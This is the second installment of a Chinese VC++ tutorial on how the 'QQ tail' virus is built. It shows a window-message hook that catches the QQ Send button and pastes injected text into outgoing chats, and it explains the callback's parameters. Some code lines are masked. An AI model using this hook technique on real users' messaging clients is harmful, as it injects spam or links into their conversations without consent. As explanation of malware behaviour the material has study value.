“QQ尾巴”病毒是如何制作的VC(2)

　　问题具体到了“QQ尾巴病毒”上边，就是我们需要一个钩子，在用户单击了“发送”按钮之后，粘贴我们的文本。我所实现的这段钩子过程为（至于如何挂接这个钩子，我会在稍后说明）： 

// 钩子过程，监视“发送”的命令消息 
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam) 
{ 
********* ** = (********* *)******; 
// 捕获“发送”按钮 
if (p-＞message == WM_COMMAND && LOWORD(p-＞wParam) == 1) 
PasteText(g_hRich); 
return CallNextHookEx(g_hProc, nCode, wParam, lParam); 
}  
　在此我对这个回调过程说明几点： 

　　1、lParam是一个指向CWPSTRUCT结构的指针，这个结构的描述如下： 

typedef struct { 
LPARAM lParam; 
WPARAM wParam; 
UINT message; 
**** ****; 
} CWPSTRUCT, *PCWPSTRUCT;  

　　这时候像我一样的SDK fans也许会会心一笑：这不是窗口回调的那四个铁杆参数么？如你所说，的确是这样，你甚至可以使用switch (p-＞message) { /* ... */ }这样的代码写成的钩子函数来全面接管QQ窗口。 

　　2、g_hRich是一个全局变量，它保存的是QQ消息文本框的句柄。这里之所以采用全局变量，是因为我无法从键盘钩子回调函数的参数中获得这个句柄。至于如何获得这个句柄以及这个全局变量的特殊位置，我会在稍后说明。

　　3、CallNextHookEx是调用钩子链中的下一个处理过程，换了钦差就会说：“十坛杏花村酒本钦差已经替皇上收下了，现在请巡抚大人把贵省正常的赋税交上来吧。”（-_-#……）这是书写钩子函数中很重要的一个环节，如果少了这一句，那么可能会导致系统的钩子链出现错误，某些程序也会没有响应――事实上我在编写这个仿真程序的时候QQ就当掉了几回。 

　　4、你也许会问为什么我捕获的是WM_COMMAND消息，这个原因让我来用下面的SDK代码（虽然QQ是用MFC写的，但是用SDK代码才能说明WM_COMMAND和“发送”按钮的关系）来说明： 

#define IDC_BTN_SENDMSG 1 // “发送”按钮ID的宏定义 
// QQ发送消息对话框回调过程李马伪造版 
LRESULT CALLBACK ProcSendDlg(HWND hDlg, UINT Msg, WPARAM wParam, LPARAM lParam) 
{ 
switch (Msg) 
{ 
case WM_CLOSE: 
EndDialog(hDlg, 0); 
break; 
case WM_COMMAND: 
{ 
switch (LOWORD(wParam)) 
{ 
case IDC_BTN_SENDMSG: 
// 发送消息... 
*****; 
// 其它的命令按钮处理部分... 
} 
} 
break; 
// 其它的case部分... 
} 
****** *; 
}